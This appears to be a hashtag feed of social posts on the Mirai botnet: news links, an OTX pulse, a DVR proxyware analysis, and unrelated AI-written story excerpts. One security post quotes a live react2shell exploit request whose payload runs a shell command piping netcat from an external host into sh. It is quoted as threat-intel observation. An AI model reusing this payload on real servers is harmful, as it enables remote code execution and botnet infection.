It turns out #Mirai malware isn’t fading, it’s multiplying. Hundreds of Mirai-based variants now host massive botnet growth, exploiting weak IoT devices and evolving attack methods.

Read more: https://hackread.com/mirai-malware-variants-botnet-growth/

#Botnet #CyberSecurity #IoT #Malware #DDoS

Mirai Malware Evolves into Hundreds of Variants Driving Botnet Growth

Mirai malware evolves into hundreds of variants, driving botnet growth, powering large-scale attacks, and increasing risks to vulnerable IoT devices worldwide.

Hackread - Cybersecurity News, Data Breaches, AI and More

Mirai Variant and Monaco Miner Campaign Targeting Linux Systems

Two malware strains are targeting Linux systems CondiBot an evolved Mirai botnet used for DDoS attacks and Monaco an SSH brute-force and cryptocurrency mining campaign.

Pulse ID: 69c1943ae53f9148f6f7f398
Pulse Link: https://otx.alienvault.com/pulse/69c1943ae53f9148f6f7f398
Pulse Author: cryptocti
Created: 2026-03-23 19:27:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DDoS #DoS #InfoSec #Linux #Malware #Mirai #OTX #OpenThreatExchange #RCE #SSH #bot #botnet #cryptocurrency #cryptocti

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Філософська прочуханка
Чи готові ви до того, щоб молот філософії
обрушився на вашу голову?

https://www.deviantart.com/deadly-poison-0/art/Tetsu-gaku-ni-Shigokareta-ua-1253819448

<>

#AI小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

#AI小説 #shukuzu  哲学に扱かれた - Deadly_Poisonの小説 - pixiv

昼休みの喧騒は、まるで小宇宙の縮図だ。弁当を囲むグループ、次の授業の予習に勤しむ者、そしてスマホの小さな画面に未来と希望を託す者たち。 私のクラスメイト、相田まなみは後者だった。 「ねえねえ、テツ知ってる? これ! 『ブレイン・スパークグミ』! 記憶力が10倍になるって、今ネット

pixiv

Філософська прочуханка
Чи готові ви до того, щоб молот філософії
обрушився на вашу голову?

https://www.pixiv.net/novel/show.php?id=26223706

<>

#AI小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

#AI小説 #kousha  Філософська прочуханка - Deadly_Poiso - pixiv

Гамір обідньої перерви — наче мікрокосм у мініатюрі. Тут є групи, що зібралися навколо своїх бенто, є ті, хто старанно готується до наступно

pixiv

Excellent work by @nicter_jp documenting a Xiongmai DVR campaign deploying residential proxy SDKs: https://blog.nicter.jp/2026/03/iot_proxyware/

We pulled the payloads and decompiled the chain.

The downloader is Mirai with all DDoS stripped out — repurposed as a vehicle for proxy monetization. It delivers two proxy SDKs: IPRoyal Pawns and PacketSDK, part of the IPIDEA network Google disrupted in January.

NICTER's IOC timeline tells the rest: PacketSDK v1.0.2 (original domains) → v1.0.6 (scrambled replacements) → v1.0.8.4 (single fallback) → not deployed. Every dispatch path is now NXDOMAIN.

A concrete view of Google's takedown continuing to have impact.

https://github.com/deepfield/public-research/blob/main/reports/2026-03-19-xiongmai-packetsdk-ipidea.md

#Mirai #IPIDEA #threatintel

Xiongmai DVR の既知の脆弱性を悪用したレジデンシャルプロキシ化事例の観測

1. 概要 既知の脆弱性(CVE-2024-3765)を悪用した攻撃が継続している Xiongmai DVR において、新たに Proxyware への感染事例を観測した。 当該事例では、従来の DDoS ボット化とは異なり、レジデンシャルプロキシ用途の Proxyware「PacketSDK」がインストールされ、実行されていた。

NICTER Blog

92.118.39[.]30 is trying to exploit #react2shell with the POST:
0={"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var+res=process.mainModule.require('child_process').execSync('(nc+45.135.194[.]27+3443+||+telnet+45.135.194[.]27+3443+||+busybox+nc+45.135.194[.]27+3443)+|+sh').toString().trim();;throw+Object.assign(new+Error('NEXT_REDIRECT'),{digest:+`NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}&1="$@0"&2=[]"

Netcat is used to trigger a #mirai downloader. Is interesting that the script atempts to kill a process using /var/Sofia (??)

#bot #malware #dfir

 哲学に扱かれた|Deadly_Poison

 昼休みの喧騒は、まるで小宇宙の縮図だ。弁当を囲むグループ、次の授業の予習に勤しむ者、そしてスマホの小さな画面に未来と希望を託す者たち。  私のクラスメイト、相田まなみは後者だった。  「ねえねえ、テツ知ってる? これ! 『ブレイン・スパークグミ』! 記憶力が10倍になるって、今ネットで超バズってるんだよ!」。  まなみは興奮した様子で、七色に輝くグミの広告画像を見せてきた。その瞳は、すでに10倍になったかのようにキラキラしている。  「ああ、それな!」。  会話に割って入ってきたのは、クラスの陽キャ代表、サッカー部の鈴木健太(すずき けんた)だ。「俺も昨日ポチったわ。これで期末テスト

note(ノート)

Філософська прочуханка
Чи готові ви до того, щоб молот філософії
обрушився на вашу голову?

https://note.com/deadly_poison_0/n/n40c583137814

<>

#AI小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

 Філософська прочуханка|Deadly_Poison

 Гамір обідньої перерви — наче мікрокосм у мініатюрі. Тут є групи, що зібралися навколо своїх бенто, є ті, хто старанно готується до наступного уроку, і є ті, хто довіряє своє майбутнє та надії маленькому екрану смартфона.  Моя однокласниця, Аіда Манамі, належала до останніх.  «Слухай-но, Тецу,

note(ノート)